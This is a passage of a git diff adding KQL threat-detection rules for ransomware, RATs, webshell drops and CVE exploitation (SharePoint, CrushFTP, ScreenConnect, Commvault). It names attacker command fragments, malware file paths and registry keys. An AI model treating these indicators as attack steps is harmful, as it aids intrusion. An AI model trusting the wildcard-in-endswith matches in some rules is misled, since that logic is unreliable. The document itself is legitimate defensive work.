"OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw"))) or (ProcessCommandLine contains "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" or ProcessCommandLine contains "TEMPLATE\\LAYOUTS\\spinstall0.aspx") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql new file mode 100644 index 00000000..3d5f9f76 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql @@ -0,0 +1,16 @@ +// Title: Suspicious CrushFTP Child Process +// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-10 +// Level: medium +// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as +CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. +The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats +// False Positives: +// - Legitimate CrushFTP administrative actions +// - Software updates + +DeviceProcessEvents +| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\crushftpservice.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql new file mode 100644 index 00000000..fed91862 --- /dev/null +++ b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql @@ -0,0 +1,10 @@ +// Title: WannaCry Ransomware Activity +// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +// Date: 2019-01-16 +// Level: critical +// Description: Detects WannaCry ransomware activity +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "@Please_Read_Me@.txt" or ((FolderPath endswith "\\tasksche.exe" or FolderPath endswith "\\mssecsvc.exe" or FolderPath endswith "\\taskdl.exe" or FolderPath endswith "\\taskhsvc.exe" or FolderPath endswith "\\taskse.exe" or FolderPath endswith "\\111.exe" or FolderPath endswith "\\lhdfrgui.exe" or FolderPath endswith "\\linuxnew.exe" or FolderPath endswith "\\wannacry.exe") or FolderPath contains "WanaDecryptor") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql new file mode 100644 index 00000000..d7a03f6f --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql @@ -0,0 +1,13 @@ +// Title: Blackbyte Ransomware Registry +// Author: frack113 +// Date: 2022-01-24 +// Level: high +// Description: Detects specific windows registry modifications made by BlackByte ransomware variants. +BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption. +This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql new file mode 100644 index 00000000..b5e28149 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql @@ -0,0 +1,10 @@ +// Title: Blue Mockingbird +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "sc config" and ProcessCommandLine contains "wercplsupporte.dll") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine endswith "COR_PROFILER" and FolderPath endswith "\\wmic.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql new file mode 100644 index 00000000..92ec323a --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql @@ -0,0 +1,10 @@ +// Title: COLDSTEEL RAT Anonymous User Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessFolderPath contains "\\Windows\\System32\\" or InitiatingProcessFolderPath contains "\\AppData\\") and AccountName contains "ANONYMOUS" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql new file mode 100644 index 00000000..97427716 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql @@ -0,0 +1,12 @@ +// Title: COLDSTEEL RAT Cleanup Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: critical +// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "UpdateDriverForPlugAndPlayDevicesW" or ProcessCommandLine contains "ServiceMain" or ProcessCommandLine contains "DiUninstallDevice") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessCommandLine contains " -k msupdate" or InitiatingProcessCommandLine contains " -k msupdate2" or InitiatingProcessCommandLine contains " -k alg") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql new file mode 100644 index 00000000..f4bd0418 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql @@ -0,0 +1,12 @@ +// Title: COLDSTEEL RAT Service Persistence Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-30 +// Level: critical +// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine endswith " -k msupdate" or ProcessCommandLine endswith " -k msupdate2" or ProcessCommandLine endswith " -k alg") and FolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql new file mode 100644 index 00000000..408b84d2 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql @@ -0,0 +1,12 @@ +// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: high +// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop. +This is a post-authentication step corresponding to CVE-2025-57790. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790 + +DeviceProcessEvents +| where ProcessCommandLine contains "qoperation" and ProcessCommandLine contains "exec" and ProcessCommandLine contains " -af " and ProcessCommandLine contains ".xml " and ProcessCommandLine contains "\\Apache\\webapps\\ROOT\\" and ProcessCommandLine contains ".jsp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql new file mode 100644 index 00000000..08a8e4cc --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql @@ -0,0 +1,14 @@ +// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry +// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO +// Date: 2020-05-13 +// Level: high +// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. +This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceRegistryEvents +| where (RegistryValueData contains ".bat" or RegistryValueData contains ".com" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".ps1" or RegistryValueData contains ".vbe" or RegistryValueData contains ".vbs" or RegistryValueData contains "C:") and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Ports" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql new file mode 100644 index 00000000..59ae319c --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql @@ -0,0 +1,13 @@ +// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation +// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress +// Date: 2024-02-21 +// Level: medium +// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats +// False Positives: +// - This will occur legitimately as well and will result in some benign activity. + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and ((FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".ashx") or (FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".aspx"))) and (not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql new file mode 100644 index 00000000..e8f35600 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: DarkGate - User Created Via Net.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-27 +// Level: high +// Description: Detects creation of local users via the net.exe command with the name of "DarkGate" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "DarkGate" and ProcessCommandLine contains "SafeMode") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql new file mode 100644 index 00000000..3b05056b --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql @@ -0,0 +1,10 @@ +// Title: Exploiting SetupComplete.cmd CVE-2019-1378 +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-11-15 +// Level: high +// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "\\cmd.exe" and InitiatingProcessCommandLine contains "/c" and InitiatingProcessCommandLine contains "C:\\Windows\\Setup\\Scripts\\") and (InitiatingProcessCommandLine endswith "SetupComplete.cmd" or InitiatingProcessCommandLine endswith "PartnerSetupComplete.cmd")) and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\Setup\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql new file mode 100644 index 00000000..39e87097 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql @@ -0,0 +1,12 @@ +// Title: Kapeka Backdoor Configuration Persistence +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: medium +// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. +The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{" and RegistryKey endswith "\\Seed") and (not(RegistryValueData contains "(Empty)")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql new file mode 100644 index 00000000..d4cf62d1 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql @@ -0,0 +1,10 @@ +// Title: Moriya Rootkit File Created +// Author: Bhabesh Raj +// Date: 2021-05-06 +// Level: critical +// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats + +DeviceFileEvents +| where FolderPath =~ "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql new file mode 100644 index 00000000..c645af9b --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql @@ -0,0 +1,10 @@ +// Title: OceanLotus Registry Activity +// Author: megan201296, Jonhnathan Ribeiro +// Date: 2019-04-14 +// Level: critical +// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*" or RegistryKey endswith "Classes\\AppX3bbba44c6cae4d9695755183472171e2*" or RegistryKey endswith "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}*" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey endswith "\\SOFTWARE\\App*" and ((RegistryKey endswith "AppXbf13d4ea2945444d8b13e2121cb6b663*" or RegistryKey endswith "AppX70162486c7554f7f80f481985d67586d*" or RegistryKey endswith "AppX37cc7fdccd644b4f85f4b22d5a3f105a*") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql new file mode 100644 index 00000000..0d6c789b --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql @@ -0,0 +1,12 @@ +// Title: Outlook Task/Note Reminder Received +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-05 +// Level: low +// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats +// False Positives: +// - Legitimate reminders received for a task or a note will also trigger this rule. + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Tasks*" or RegistryKey endswith "\\Notes*") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook*") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql new file mode 100644 index 00000000..a8a4410a --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql @@ -0,0 +1,10 @@ +// Title: Potential BearLPE Exploitation +// Author: Olaf Hartong +// Date: 2019-05-22 +// Level: high +// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "/change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/RP") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql new file mode 100644 index 00000000..05ec713c --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql @@ -0,0 +1,10 @@ +// Title: Potential COLDSTEEL Persistence Service DLL Creation +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql new file mode 100644 index 00000000..fa83fb64 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql @@ -0,0 +1,13 @@ +// Title: Potential COLDSTEEL Persistence Service DLL Load +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-02 +// Level: high +// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql new file mode 100644 index 00000000..7a667ab9 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql @@ -0,0 +1,10 @@ +// Title: Potential COLDSTEEL RAT File Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents +| where FolderPath =~ "C:\\users\\public\\Documents\\dllhost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql new file mode 100644 index 00000000..36902f6b --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql @@ -0,0 +1,10 @@ +// Title: Potential COLDSTEEL RAT Windows User Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-02 +// Level: high +// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceRegistryEvents +| where (RegistryValueData contains "ANONYMOUS" or RegistryValueData contains "_DomainUser_") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-" and RegistryKey contains "\\ProfileImagePath") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql new file mode 100644 index 00000000..2cf6fc66 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader +// Author: Gregory +// Date: 2023-10-11 +// Level: high +// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\FoxitPDFReader.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" and FolderPath endswith ".hta" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql new file mode 100644 index 00000000..4fe9a997 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2023-36884 Exploitation Dropped File +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2023-07-13 +// Level: medium +// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" and FolderPath endswith "\\file001.url" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql new file mode 100644 index 00000000..56c86dbc --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql @@ -0,0 +1,12 @@ +// Title: Potential Encrypted Registry Blob Related To SNAKE Malware +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: medium +// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats +// False Positives: +// - Some additional tuning might be required to tune out legitimate processes that write to this key by default + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*" and (not((RegistryKey endswith ".AssocFile.WAV" or RegistryKey contains ".wav."))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql 